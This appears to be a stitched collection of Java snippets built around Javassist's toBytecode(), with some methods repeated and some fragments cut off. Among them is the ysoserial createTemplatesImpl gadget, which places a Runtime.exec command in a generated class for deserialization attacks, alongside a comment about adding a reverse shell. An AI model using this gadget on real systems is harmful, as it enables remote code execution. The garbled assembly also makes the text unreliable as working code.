/**
 * Serializes this class into class-file format and returns the bytes.
 * Once this method is called, further modifications are not
 * possible any more.
 *
 * @return the contents of the class file.
 */
public byte[] toBytecode() throws IOException, CannotCompileException {
    ByteArrayOutputStream buffer = new ByteArrayOutputStream();
    // The sink is purely in-memory; closing it flushes the wrapper into the buffer.
    try (DataOutputStream sink = new DataOutputStream(buffer)) {
        toBytecode(sink);
    }
    return buffer.toByteArray();
}
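/**
 * Writes a class file represented by this <code>CtClass</code>
 * object on a local disk.
 * Once this method is called, further modifications are not
 * possible any more.
 *
 * <p>The output stream is obtained from {@code makeFileOutput(directoryName)}.
 * NOTE(review): that helper is not shown here; confirm how it builds the
 * target path before passing a directory name that originates outside
 * the program.
 *
 * @param directoryName it must end without a directory separator.
 * @throws CannotCompileException declared by the conversion step.
 * @throws IOException declared by opening, writing or closing the output stream.
 * @see #debugWriteFile(String)
 */
public void writeFile(String directoryName) throws CannotCompileException, IOException {
    // try-with-resources: a failure in close() is recorded as a suppressed
    // exception instead of replacing an exception thrown while writing.
    try (DataOutputStream out = makeFileOutput(directoryName)) {
        toBytecode(out);
    }
}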
/**
 * Invokes the protected {@code defineClass()} in {@code ClassLoader}.
 * The bytecode of the given {@link CtClass} is generated first and then
 * defined under the name reported by {@code cc.getName()}, using the
 * four-argument form (name, bytes, offset, length).
 *
 * @param cc the class to convert into a {@code java.lang.Class}.
 * @return the class returned by {@code defineClass()}.
 */
public Class<?> invokeDefineClass(CtClass cc) throws IOException, CannotCompileException {
    final byte[] classFile = cc.toBytecode();
    final String className = cc.getName();
    return defineClass(className, classFile, 0, classFile.length);
}
} // closes the enclosing class, whose header is not part of this excerpt
/**
 * Serializes this class into class-file format and returns the bytes.
 * Once this method is called, further modifications are not
 * possible any more.
 *
 * @return the contents of the class file.
 */
public byte[] toBytecode() throws IOException, CannotCompileException {
    ByteArrayOutputStream buffer = new ByteArrayOutputStream();
    // The sink is purely in-memory; closing it flushes the wrapper into the buffer.
    try (DataOutputStream sink = new DataOutputStream(buffer)) {
        toBytecode(sink);
    }
    return buffer.toByteArray();
}
/**
 * Serializes the given class into class-file bytes held in memory.
 *
 * @param managedCtClass the class to serialize.
 * @return the bytes written by {@code managedCtClass.toBytecode(...)}.
 * @throws HibernateException wrapping any exception raised while serializing;
 *         the original exception is kept as the cause.
 */
private byte[] getByteCode(CtClass managedCtClass) {
    final ByteArrayOutputStream buffer = new ByteArrayOutputStream();
    final DataOutputStream sink = new DataOutputStream( buffer );
    try {
        managedCtClass.toBytecode( sink );
        return buffer.toByteArray();
    }
    catch (Exception failure) {
        final String reason = failure.getMessage();
        log.unableToTransformClass( reason );
        throw new HibernateException( "Unable to transform class: " + reason, failure );
    }
    finally {
        try {
            sink.close();
        }
        catch (IOException ignored) {
            // best effort: a close failure is deliberately not reported
        }
    }
}
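/**
 * Writes a class file represented by this <code>CtClass</code>
 * object on a local disk.
 * Once this method is called, further modifications are not
 * possible any more.
 *
 * <p>The output stream is obtained from {@code makeFileOutput(directoryName)}.
 * NOTE(review): that helper is not shown here; confirm how it builds the
 * target path before passing a directory name that originates outside
 * the program.
 *
 * @param directoryName it must end without a directory separator.
 * @throws CannotCompileException declared by the conversion step.
 * @throws IOException declared by opening, writing or closing the output stream.
 * @see #debugWriteFile(String)
 */
public void writeFile(String directoryName) throws CannotCompileException, IOException {
    // try-with-resources: a failure in close() is recorded as a suppressed
    // exception instead of replacing an exception thrown while writing.
    try (DataOutputStream out = makeFileOutput(directoryName)) {
        toBytecode(out);
    }
}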
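/**
 * Writes every class in {@code box} into {@code jarFile}, instrumenting the
 * classes selected by {@code isNeedInsertClass} and copying the rest unchanged.
 *
 * <p>Each class is first made public. Interfaces and classes without declared
 * methods are never instrumented.
 *
 * @param box     the classes to write.
 * @param jarFile the jar file to create.
 * @throws IOException            if the jar cannot be written.
 * @throws CannotCompileException if a class cannot be converted to bytecode.
 */
@Override
protected void insertCode(List<CtClass> box, File jarFile) throws IOException, CannotCompileException {
    // Both streams are managed resources, so the jar and the underlying file
    // are closed even when converting or writing one of the classes fails.
    try (FileOutputStream fileOut = new FileOutputStream(jarFile);
         ZipOutputStream outStream = new JarOutputStream(fileOut)) {
        // get every class in the box, ready to insert code
        for (CtClass ctClass : box) {
            // change modifier to public, so all the classes in the apk will be public
            // and can be accessed from the patch.
            // NOTE(review): this removes class-level access restrictions for the whole
            // app; confirm that the wider visibility is acceptable in release builds.
            ctClass.setModifiers(AccessFlag.setPublic(ctClass.getModifiers()));

            String className = ctClass.getName();
            // replace('.', '/') yields the same result as replaceAll("\\.", "/") without a regex
            String internalName = className.replace('.', '/');
            String entryName = internalName + ".class";

            boolean instrument = isNeedInsertClass(className)
                    && !(ctClass.isInterface() || ctClass.getDeclaredMethods().length < 1);
            if (instrument) {
                // only insert code into specific classes
                zipFile(transformCode(ctClass.toBytecode(), internalName), outStream, entryName);
            } else {
                zipFile(ctClass.toBytecode(), outStream, entryName);
            }
        }
    }
}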
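/**
 * Writes an agent jar to {@code jar}. The manifest names {@code HotSwapAgent}
 * as both {@code Premain-Class} and {@code Agent-Class} and enables
 * {@code Can-Retransform-Classes} and {@code Can-Redefine-Classes}; the only
 * entry is the class file of {@code HotSwapAgent} taken from the default
 * {@code ClassPool}.
 *
 * <p>NOTE(review): how the jar is loaded afterwards is not shown here. If it is
 * attached to a running JVM, {@code jar} should live in a location that other
 * local users cannot replace, because the manifest grants class redefinition.
 *
 * @param jar the file to write.
 * @return the same {@code jar} argument.
 */
private static File createJarFile(File jar) throws IOException, CannotCompileException, NotFoundException {
    String agentClassName = HotSwapAgent.class.getName();

    Manifest manifest = new Manifest();
    Attributes attrs = manifest.getMainAttributes();
    attrs.put(Attributes.Name.MANIFEST_VERSION, "1.0");
    attrs.put(new Attributes.Name("Premain-Class"), agentClassName);
    attrs.put(new Attributes.Name("Agent-Class"), agentClassName);
    attrs.put(new Attributes.Name("Can-Retransform-Classes"), "true");
    attrs.put(new Attributes.Name("Can-Redefine-Classes"), "true");

    // The file stream is its own resource so it is closed even if the
    // JarOutputStream constructor fails while writing the manifest.
    try (FileOutputStream fileOut = new FileOutputStream(jar);
         JarOutputStream jos = new JarOutputStream(fileOut, manifest)) {
        jos.putNextEntry(new JarEntry(agentClassName.replace('.', '/') + ".class"));
        CtClass clazz = ClassPool.getDefault().get(agentClassName);
        jos.write(clazz.toBytecode());
        jos.closeEntry();
    }
    return jar;
}
} // closes the enclosing class, whose header is not part of this excerpt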
/**
 * Sends the class file of the class named by {@code filename}, generated from
 * {@code classPool}, to {@code out}.
 *
 * <p>The class name is {@code filename} without its last six characters, with
 * {@code '/'} replaced by {@code '.'}. When {@code debugDir} is set, the class
 * file is also written there.
 *
 * <p>NOTE(review): the exception type suggests {@code filename} comes from an
 * HTTP request. It decides which class is resolved from the pool and, with
 * {@code debugDir} set, written to disk; confirm the caller has checked the
 * name and that {@code length} is at least 6.
 *
 * @param out      the stream the header and class file are written to.
 * @param filename the requested path.
 * @param length   the length used to cut the suffix off {@code filename}.
 * @return {@code false} if no class pool is configured, {@code true} once the
 *         class file has been sent.
 * @throws BadHttpRequest wrapping any exception raised while obtaining the class file.
 */
private boolean letUsersSendClassfile(OutputStream out, String filename, int length)
        throws IOException, BadHttpRequest {
    if (classPool == null) {
        return false;
    }

    // Strip the six-character suffix and turn the path into a dotted name.
    final String classname = filename.substring(0, length - 6).replace('/', '.');

    final byte[] classfile;
    try {
        if (translator != null) {
            translator.onLoad(classPool, classname);
        }

        final CtClass requested = classPool.get(classname);
        classfile = requested.toBytecode();
        if (debugDir != null) {
            requested.writeFile(debugDir);
        }
    } catch (Exception e) {
        throw new BadHttpRequest(e);
    }

    sendHeader(out, classfile.length, typeClass);
    out.write(classfile);
    return true;
}
byte[] b = ct.toBytecode(); java.lang.reflect.Method method; Object[] args;
/**
 * Sends the class file of the class named by {@code filename}, generated from
 * {@code classPool}, to {@code out}.
 *
 * <p>The class name is {@code filename} without its last six characters, with
 * {@code '/'} replaced by {@code '.'}. When {@code debugDir} is set, the class
 * file is also written there.
 *
 * <p>NOTE(review): the exception type suggests {@code filename} comes from an
 * HTTP request. It decides which class is resolved from the pool and, with
 * {@code debugDir} set, written to disk; confirm the caller has checked the
 * name and that {@code length} is at least 6.
 *
 * @param out      the stream the header and class file are written to.
 * @param filename the requested path.
 * @param length   the length used to cut the suffix off {@code filename}.
 * @return {@code false} if no class pool is configured, {@code true} once the
 *         class file has been sent.
 * @throws BadHttpRequest wrapping any exception raised while obtaining the class file.
 */
private boolean letUsersSendClassfile(OutputStream out, String filename, int length)
        throws IOException, BadHttpRequest {
    if (classPool == null) {
        return false;
    }

    // Strip the six-character suffix and turn the path into a dotted name.
    final String classname = filename.substring(0, length - 6).replace('/', '.');

    final byte[] classfile;
    try {
        if (translator != null) {
            translator.onLoad(classPool, classname);
        }

        final CtClass requested = classPool.get(classname);
        classfile = requested.toBytecode();
        if (debugDir != null) {
            requested.writeFile(debugDir);
        }
    } catch (Exception e) {
        throw new BadHttpRequest(e);
    }

    sendHeader(out, classfile.length, typeClass);
    out.write(classfile);
    return true;
}
/**
 * Converts the class to a <code>java.lang.Class</code> object.
 * Once this method is called, further modifications are not allowed
 * any more.
 *
 * <p>This method is available in Java 9 or later.
 * It loads the class
 * by using the given {@code java.lang.invoke.MethodHandles.Lookup}.
 * </p>
 *
 * @param ct     the class converted into {@code java.lang.Class}.
 * @param lookup the lookup handed to {@code DefineClassHelper.toClass}
 *               together with the generated bytecode.
 * @throws CannotCompileException also used to wrap an {@code IOException}
 *         raised inside the conversion.
 * @since 3.24
 */
public Class<?> toClass(CtClass ct, java.lang.invoke.MethodHandles.Lookup lookup)
        throws CannotCompileException {
    try {
        final byte[] classFile = ct.toBytecode();
        return javassist.util.proxy.DefineClassHelper.toClass(lookup, classFile);
    } catch (IOException cause) {
        throw new CannotCompileException(cause);
    }
}
classfile = source.get(name).toBytecode();
/**
 * Converts the class to a <code>java.lang.Class</code> object.
 * Once this method is called, further modifications are not allowed
 * any more.
 *
 * <p>This method is available in Java 9 or later.
 * It loads the class
 * by using {@code java.lang.invoke.MethodHandles} with {@code neighbor}.
 * </p>
 *
 * @param ct       the class converted into {@code java.lang.Class}.
 * @param neighbor a class belonging to the same package that
 *                 the converted class belongs to.
 * @throws CannotCompileException also used to wrap an {@code IOException}
 *         raised inside the conversion.
 * @since 3.24
 */
public Class<?> toClass(CtClass ct, Class<?> neighbor) throws CannotCompileException {
    try {
        final byte[] classFile = ct.toBytecode();
        return javassist.util.proxy.DefineClassHelper.toClass(neighbor, classFile);
    } catch (IOException cause) {
        throw new CannotCompileException(cause);
    }
}
neighbor, loader, domain, ct.toBytecode());
/**
 * Builds a {@code tplClass} instance whose {@code _bytecodes} field carries a
 * generated class with {@code command} placed in its static initializer.
 *
 * <p>Reading aid for reviewers and detection engineers. The visible steps are:
 * instantiate {@code tplClass}; load {@code StubTransletPayload} through the
 * default {@code ClassPool}; append a {@code Runtime.exec} statement to its
 * class initializer; rename it to {@code ysoserial.Pwner} plus a nanosecond
 * timestamp; set its superclass to {@code abstTranslet}; then write the bytes
 * and two other fields into the instance by reflection. How and when the
 * embedded class is defined is not shown here.
 *
 * <p>Defensive notes: the default markers visible below ({@code ysoserial.Pwner}
 * class-name prefix, {@code _name} value {@code Pwnr}) can be matched in captured
 * serialized data, although they are easy to change. The durable control is to
 * avoid deserializing untrusted data, or to restrict the accepted classes with
 * an allow-list filter such as {@code java.io.ObjectInputFilter}.
 *
 * @param command       the command string embedded in the generated initializer.
 * @param tplClass      the templates class to instantiate and populate.
 * @param abstTranslet  the class set as superclass of the generated class.
 * @param transFactory  the class instantiated for the {@code _tfactory} field.
 * @return the populated {@code tplClass} instance.
 * @throws Exception any failure from reflection or bytecode generation.
 */
public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )
        throws Exception {
    final T templates = tplClass.newInstance();

    // use template gadget class
    ClassPool pool = ClassPool.getDefault();
    pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
    pool.insertClassPath(new ClassClassPath(abstTranslet));
    final CtClass clazz = pool.get(StubTransletPayload.class.getName());
    // run command in static initializer
    // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
    // The command goes through two replaceAll passes (backslash, double quote)
    // before being embedded in the generated source statement.
    String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
        command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
        "\");";
    clazz.makeClassInitializer().insertAfter(cmd);
    // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
    clazz.setName("ysoserial.Pwner" + System.nanoTime());
    CtClass superC = pool.get(abstTranslet.getName());
    clazz.setSuperclass(superC);

    final byte[] classBytes = clazz.toBytecode();

    // inject class bytes into instance
    // (the second array element is the class file of Foo, obtained via ClassFiles.classAsBytes)
    Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
        classBytes, ClassFiles.classAsBytes(Foo.class)
    });

    // required to make TemplatesImpl happy
    Reflections.setFieldValue(templates, "_name", "Pwnr");
    Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
    return templates;
}
classfile = source.get(name).toBytecode();
/**
 * Redefines classes.
 *
 * <p>Starts the agent, pairs each element of {@code oldClasses} with the
 * bytecode of the element of {@code newClasses} at the same index, and hands
 * the resulting definitions to {@code instrumentation.redefineClasses}.
 * The loop is driven by {@code oldClasses.length}, so {@code newClasses} is
 * expected to hold at least as many elements.
 *
 * @param oldClasses the loaded classes to redefine.
 * @param newClasses the replacement definitions, index-aligned with {@code oldClasses}.
 * @throws NotFoundException      wrapping a {@code ClassNotFoundException} from the redefinition.
 * @throws CannotCompileException wrapping an {@code UnmodifiableClassException} from the redefinition.
 */
public static void redefine(Class<?>[] oldClasses, CtClass[] newClasses)
        throws NotFoundException, IOException, CannotCompileException {
    startAgent();

    final ClassDefinition[] defs = new ClassDefinition[oldClasses.length];
    int index = 0;
    for (Class<?> target : oldClasses) {
        defs[index] = new ClassDefinition(target, newClasses[index].toBytecode());
        index++;
    }

    try {
        instrumentation.redefineClasses(defs);
    } catch (ClassNotFoundException missing) {
        throw new NotFoundException(missing.getMessage(), missing);
    } catch (UnmodifiableClassException locked) {
        throw new CannotCompileException(locked.getMessage(), locked);
    }
}
if (ctClass.isInterface() || ctClass.getDeclaredMethods().length < 1) { zipFile(ctClass.toBytecode(), outStream, ctClass.getName().replaceAll("\\.", "/") + ".class"); continue; zipFile(ctClass.toBytecode(), outStream, ctClass.getName().replaceAll("\\.", "/") + ".class");
byteCode = ctClass.toBytecode(); ctClass.detach();